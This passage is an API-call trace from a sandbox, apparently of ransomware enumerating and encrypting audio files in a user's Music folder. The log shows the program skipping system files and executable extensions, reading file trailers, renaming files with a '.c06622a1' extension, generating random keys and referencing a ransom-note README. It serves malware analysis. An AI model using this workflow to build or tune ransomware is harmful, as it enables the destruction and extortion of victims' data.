[0150.451] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0150.451] wcslen (_String="msc") returned 0x3 [0150.451] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0150.451] wcslen (_String="msp") returned 0x3 [0150.451] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0150.451] wcslen (_String="msstyles") returned 0x8 [0150.451] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0150.451] wcslen (_String="msu") returned 0x3 [0150.451] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0150.451] wcslen (_String="nls") returned 0x3 [0150.451] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0150.451] wcslen (_String="nomedia") returned 0x7 [0150.451] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0150.452] wcslen (_String="ocx") returned 0x3 [0150.452] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0150.452] wcslen (_String="prf") returned 0x3 [0150.452] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0150.452] wcslen (_String="ps1") returned 0x3 [0150.452] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0150.452] wcslen (_String="rom") returned 0x3 [0150.452] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0150.452] wcslen (_String="rtp") returned 0x3 [0150.452] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0150.452] wcslen (_String="scr") returned 0x3 [0150.452] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0150.452] wcslen (_String="shs") returned 0x3 [0150.452] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0150.452] wcslen (_String="spl") returned 0x3 [0150.452] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0150.452] wcslen (_String="sys") returned 0x3 [0150.452] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0150.452] wcslen (_String="theme") returned 0x5 [0150.452] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0150.452] wcslen (_String="themepack") returned 0x9 [0150.452] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0150.452] wcslen (_String="wpx") returned 0x3 [0150.452] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0150.452] wcslen (_String="lock") returned 0x4 [0150.452] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0150.452] wcslen (_String="key") returned 0x3 [0150.452] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0150.452] wcslen (_String="hta") returned 0x3 [0150.452] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0150.452] wcslen (_String="msi") returned 0x3 [0150.452] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0150.452] wcslen (_String="pdb") returned 0x3 [0150.452] _wcsicmp (_Str1="sql", _Str2="mp3") returned 6 [0150.452] wcslen (_String="sql") returned 0x3 [0150.452] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0150.452] wcslen (_String="sqlite") returned 0x6 [0150.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 0x10 [0150.453] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.453] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" [0150.453] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned 0x33 [0150.453] wcscpy (in: _Dest=0x45000f8, _Source="9OXK2ad.mp3" | out: _Dest="9OXK2ad.mp3") returned="9OXK2ad.mp3" [0150.453] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3", dwFileAttributes=0x80) returned 1 [0150.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\9oxk2ad.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0150.453] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.454] ReadFile (in: hFile=0x640, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0150.454] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0xfed5412b [0150.454] RtlComputeCrc32 (PartialCrc=0x412b, Buffer=0x3fe8f4, Length=0x80) returned 0x6e755933 [0150.454] RtlComputeCrc32 (PartialCrc=0x5933, Buffer=0x3fe8f4, Length=0x80) returned 0xda5caecc [0150.454] RtlComputeCrc32 (PartialCrc=0xaecc, Buffer=0x3fe8f4, Length=0x80) returned 0x54d00a63 [0150.454] RtlComputeCrc32 (PartialCrc=0xa63, Buffer=0x3fe8f4, Length=0x80) returned 0x78a01a16 [0150.454] CloseHandle (hObject=0x640) returned 1 [0150.454] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.455] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3" [0150.455] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3") returned 0x3f [0150.455] wcscpy (in: _Dest=0x4510116, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.455] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\9oxk2ad.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\9oxk2ad.mp3.c06622a1"), dwFlags=0x8) returned 1 [0150.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\9OXK2ad.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\9oxk2ad.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0150.459] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.460] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6a404fc6 [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e2d80ea [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12dfa035 [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1adb34de [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6ef663e6 [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x162200fa [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3fa753fd [0150.465] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65fe864f [0150.468] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0x6130c86 [0150.468] RtlComputeCrc32 (PartialCrc=0xc86, Buffer=0x2f30094, Length=0x80) returned 0xdcc9b013 [0150.468] RtlComputeCrc32 (PartialCrc=0xb013, Buffer=0x2f30094, Length=0x80) returned 0xc293cae4 [0150.468] RtlComputeCrc32 (PartialCrc=0xcae4, Buffer=0x2f30094, Length=0x80) returned 0x6a5e197d [0150.468] RtlComputeCrc32 (PartialCrc=0x197d, Buffer=0x2f30094, Length=0x80) returned 0x5afa71e0 [0150.468] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0150.468] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.468] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.468] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54234490, ftCreationTime.dwHighDateTime=0x1d5e231, ftLastAccessTime.dwLowDateTime=0x8757ea50, ftLastAccessTime.dwHighDateTime=0x1d5dab1, ftLastWriteTime.dwLowDateTime=0x8757ea50, ftLastWriteTime.dwHighDateTime=0x1d5dab1, nFileSizeHigh=0x0, nFileSizeLow=0xe70e, dwReserved0=0x0, dwReserved1=0x0, cFileName="glC_GXnPfR_aHYD651.wav", cAlternateFileName="GLC_GX~1.WAV")) returned 1 [0150.468] _wcsicmp (_Str1="glC_GXnPfR_aHYD651.wav", _Str2="README.c06622a1.TXT") returned -11 [0150.468] wcsstr (_Str="glC_GXnPfR_aHYD651.wav", _SubStr="README") returned 0x0 [0150.468] _wcsicmp (_Str1="autorun.inf", _Str2="glC_GXnPfR_aHYD651.wav") returned -6 [0150.469] wcslen (_String="autorun.inf") returned 0xb [0150.469] _wcsicmp (_Str1="boot.ini", _Str2="glC_GXnPfR_aHYD651.wav") returned -5 [0150.469] wcslen (_String="boot.ini") returned 0x8 [0150.469] _wcsicmp (_Str1="bootfont.bin", _Str2="glC_GXnPfR_aHYD651.wav") returned -5 [0150.469] wcslen (_String="bootfont.bin") returned 0xc [0150.469] _wcsicmp (_Str1="bootsect.bak", _Str2="glC_GXnPfR_aHYD651.wav") returned -5 [0150.469] wcslen (_String="bootsect.bak") returned 0xc [0150.469] _wcsicmp (_Str1="desktop.ini", _Str2="glC_GXnPfR_aHYD651.wav") returned -3 [0150.469] wcslen (_String="desktop.ini") returned 0xb [0150.469] _wcsicmp (_Str1="iconcache.db", _Str2="glC_GXnPfR_aHYD651.wav") returned 2 [0150.469] wcslen (_String="iconcache.db") returned 0xc [0150.469] _wcsicmp (_Str1="ntldr", _Str2="glC_GXnPfR_aHYD651.wav") returned 7 [0150.469] wcslen (_String="ntldr") returned 0x5 [0150.469] _wcsicmp (_Str1="ntuser.dat", _Str2="glC_GXnPfR_aHYD651.wav") returned 7 [0150.469] wcslen (_String="ntuser.dat") returned 0xa [0150.469] _wcsicmp (_Str1="ntuser.dat.log", _Str2="glC_GXnPfR_aHYD651.wav") returned 7 [0150.469] wcslen (_String="ntuser.dat.log") returned 0xe [0150.469] _wcsicmp (_Str1="ntuser.ini", _Str2="glC_GXnPfR_aHYD651.wav") returned 7 [0150.469] wcslen (_String="ntuser.ini") returned 0xa [0150.469] _wcsicmp (_Str1="thumbs.db", _Str2="glC_GXnPfR_aHYD651.wav") returned 13 [0150.469] wcslen (_String="thumbs.db") returned 0x9 [0150.469] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0150.469] wcslen (_String="386") returned 0x3 [0150.469] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0150.469] wcslen (_String="adv") returned 0x3 [0150.469] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0150.469] wcslen (_String="ani") returned 0x3 [0150.469] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0150.469] wcslen (_String="bat") returned 0x3 [0150.469] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0150.469] wcslen (_String="bin") returned 0x3 [0150.469] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0150.469] wcslen (_String="cab") returned 0x3 [0150.469] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0150.469] wcslen (_String="cmd") returned 0x3 [0150.469] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0150.469] wcslen (_String="com") returned 0x3 [0150.469] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0150.470] wcslen (_String="cpl") returned 0x3 [0150.470] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0150.470] wcslen (_String="cur") returned 0x3 [0150.470] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0150.470] wcslen (_String="deskthemepack") returned 0xd [0150.470] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0150.470] wcslen (_String="diagcab") returned 0x7 [0150.470] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0150.470] wcslen (_String="diagcfg") returned 0x7 [0150.470] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0150.470] wcslen (_String="diagpkg") returned 0x7 [0150.470] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0150.470] wcslen (_String="dll") returned 0x3 [0150.470] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0150.470] wcslen (_String="drv") returned 0x3 [0150.470] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0150.470] wcslen (_String="exe") returned 0x3 [0150.470] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0150.470] wcslen (_String="hlp") returned 0x3 [0150.470] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0150.470] wcslen (_String="icl") returned 0x3 [0150.470] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0150.470] wcslen (_String="icns") returned 0x4 [0150.470] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0150.470] wcslen (_String="ico") returned 0x3 [0150.470] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0150.470] wcslen (_String="ics") returned 0x3 [0150.470] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0150.470] wcslen (_String="idx") returned 0x3 [0150.470] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0150.470] wcslen (_String="ldf") returned 0x3 [0150.470] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0150.470] wcslen (_String="lnk") returned 0x3 [0150.470] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0150.470] wcslen (_String="mod") returned 0x3 [0150.470] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0150.470] wcslen (_String="mpa") returned 0x3 [0150.470] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0150.470] wcslen (_String="msc") returned 0x3 [0150.470] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0150.471] wcslen (_String="msp") returned 0x3 [0150.471] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0150.471] wcslen (_String="msstyles") returned 0x8 [0150.471] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0150.471] wcslen (_String="msu") returned 0x3 [0150.471] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0150.471] wcslen (_String="nls") returned 0x3 [0150.471] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0150.471] wcslen (_String="nomedia") returned 0x7 [0150.471] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0150.471] wcslen (_String="ocx") returned 0x3 [0150.471] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0150.471] wcslen (_String="prf") returned 0x3 [0150.471] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0150.471] wcslen (_String="ps1") returned 0x3 [0150.471] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0150.471] wcslen (_String="rom") returned 0x3 [0150.471] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0150.471] wcslen (_String="rtp") returned 0x3 [0150.471] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0150.471] wcslen (_String="scr") returned 0x3 [0150.471] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0150.471] wcslen (_String="shs") returned 0x3 [0150.471] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0150.471] wcslen (_String="spl") returned 0x3 [0150.471] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0150.471] wcslen (_String="sys") returned 0x3 [0150.471] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0150.471] wcslen (_String="theme") returned 0x5 [0150.471] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0150.471] wcslen (_String="themepack") returned 0x9 [0150.471] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0150.471] wcslen (_String="wpx") returned 0x3 [0150.471] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0150.471] wcslen (_String="lock") returned 0x4 [0150.471] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0150.471] wcslen (_String="key") returned 0x3 [0150.471] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0150.472] wcslen (_String="hta") returned 0x3 [0150.472] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0150.472] wcslen (_String="msi") returned 0x3 [0150.472] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0150.472] wcslen (_String="pdb") returned 0x3 [0150.472] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0150.472] wcslen (_String="sql") returned 0x3 [0150.472] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0150.472] wcslen (_String="sqlite") returned 0x6 [0150.472] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn")) returned 0x10 [0150.472] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.472] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN" [0150.472] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN") returned 0x33 [0150.472] wcscpy (in: _Dest=0x45000f8, _Source="glC_GXnPfR_aHYD651.wav" | out: _Dest="glC_GXnPfR_aHYD651.wav") returned="glC_GXnPfR_aHYD651.wav" [0150.472] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav", dwFileAttributes=0x80) returned 1 [0150.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\glc_gxnpfr_ahyd651.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x67c [0150.472] SetFilePointerEx (in: hFile=0x67c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.472] ReadFile (in: hFile=0x67c, lpBuffer=0x3fe8f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe984, lpOverlapped=0x0 | out: lpBuffer=0x3fe8f4*, lpNumberOfBytesRead=0x3fe984*=0x90, lpOverlapped=0x0) returned 1 [0150.473] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe8f4, Length=0x80) returned 0x927eb661 [0150.473] RtlComputeCrc32 (PartialCrc=0xb661, Buffer=0x3fe8f4, Length=0x80) returned 0xa72417aa [0150.473] RtlComputeCrc32 (PartialCrc=0x17aa, Buffer=0x3fe8f4, Length=0x80) returned 0x4cedd57f [0150.473] RtlComputeCrc32 (PartialCrc=0xd57f, Buffer=0x3fe8f4, Length=0x80) returned 0x22d42f02 [0150.473] RtlComputeCrc32 (PartialCrc=0x2f02, Buffer=0x3fe8f4, Length=0x80) returned 0xae4541b2 [0150.473] CloseHandle (hObject=0x67c) returned 1 [0150.473] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.473] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav" [0150.473] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav") returned 0x4a [0150.473] wcscpy (in: _Dest=0x451012c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.474] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\glc_gxnpfr_ahyd651.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\glc_gxnpfr_ahyd651.wav.c06622a1"), dwFlags=0x8) returned 1 [0150.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4ytVPICjNJN\\glC_GXnPfR_aHYD651.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4ytvpicjnjn\\glc_gxnpfr_ahyd651.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x67c [0150.476] CreateIoCompletionPort (FileHandle=0x67c, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.476] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76e64e72 [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x737c2ff4 [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7149c5ac [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x66c7bdb [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x76d72bd [0150.481] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ce4ab39 [0150.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1510871b [0150.482] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xb6b0cc7 [0150.485] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x220faf47 [0150.485] RtlComputeCrc32 (PartialCrc=0xaf47, Buffer=0x41f0094, Length=0x80) returned 0x949a1908 [0150.485] RtlComputeCrc32 (PartialCrc=0x1908, Buffer=0x41f0094, Length=0x80) returned 0x8b041d99 [0150.485] RtlComputeCrc32 (PartialCrc=0x1d99, Buffer=0x41f0094, Length=0x80) returned 0x5a9d731 [0150.485] RtlComputeCrc32 (PartialCrc=0xd731, Buffer=0x41f0094, Length=0x80) returned 0xeddda13c [0150.485] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0150.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.485] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.485] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44734f50, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0xddd3d2f0, ftLastAccessTime.dwHighDateTime=0x1d5db6e, ftLastWriteTime.dwLowDateTime=0xddd3d2f0, ftLastWriteTime.dwHighDateTime=0x1d5db6e, nFileSizeHigh=0x0, nFileSizeLow=0x17ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="kakWe5.m4a", cAlternateFileName="")) returned 1 [0150.485] _wcsicmp (_Str1="kakWe5.m4a", _Str2="README.c06622a1.TXT") returned -7 [0150.485] wcsstr (_Str="kakWe5.m4a", _SubStr="README") returned 0x0 [0150.485] _wcsicmp (_Str1="autorun.inf", _Str2="kakWe5.m4a") returned -10 [0150.485] wcslen (_String="autorun.inf") returned 0xb [0150.485] _wcsicmp (_Str1="boot.ini", _Str2="kakWe5.m4a") returned -9 [0150.485] wcslen (_String="boot.ini") returned 0x8 [0150.485] _wcsicmp (_Str1="bootfont.bin", _Str2="kakWe5.m4a") returned -9 [0150.485] wcslen (_String="bootfont.bin") returned 0xc [0150.485] _wcsicmp (_Str1="bootsect.bak", _Str2="kakWe5.m4a") returned -9 [0150.485] wcslen (_String="bootsect.bak") returned 0xc [0150.485] _wcsicmp (_Str1="desktop.ini", _Str2="kakWe5.m4a") returned -7 [0150.485] wcslen (_String="desktop.ini") returned 0xb [0150.485] _wcsicmp (_Str1="iconcache.db", _Str2="kakWe5.m4a") returned -2 [0150.485] wcslen (_String="iconcache.db") returned 0xc [0150.485] _wcsicmp (_Str1="ntldr", _Str2="kakWe5.m4a") returned 3 [0150.485] wcslen (_String="ntldr") returned 0x5 [0150.485] _wcsicmp (_Str1="ntuser.dat", _Str2="kakWe5.m4a") returned 3 [0150.485] wcslen (_String="ntuser.dat") returned 0xa [0150.485] _wcsicmp (_Str1="ntuser.dat.log", _Str2="kakWe5.m4a") returned 3 [0150.485] wcslen (_String="ntuser.dat.log") returned 0xe [0150.485] _wcsicmp (_Str1="ntuser.ini", _Str2="kakWe5.m4a") returned 3 [0150.485] wcslen (_String="ntuser.ini") returned 0xa [0150.485] _wcsicmp (_Str1="thumbs.db", _Str2="kakWe5.m4a") returned 9 [0150.486] wcslen (_String="thumbs.db") returned 0x9 [0150.486] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0150.486] wcslen (_String="386") returned 0x3 [0150.486] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0150.486] wcslen (_String="adv") returned 0x3 [0150.486] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0150.486] wcslen (_String="ani") returned 0x3 [0150.486] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0150.486] wcslen (_String="bat") returned 0x3 [0150.486] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0150.486] wcslen (_String="bin") returned 0x3 [0150.486] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0150.486] wcslen (_String="cab") returned 0x3 [0150.486] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0150.486] wcslen (_String="cmd") returned 0x3 [0150.486] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0150.486] wcslen (_String="com") returned 0x3 [0150.486] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0150.486] wcslen (_String="cpl") returned 0x3 [0150.486] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0150.486] wcslen (_String="cur") returned 0x3 [0150.486] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0150.486] wcslen (_String="deskthemepack") returned 0xd [0150.486] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0150.486] wcslen 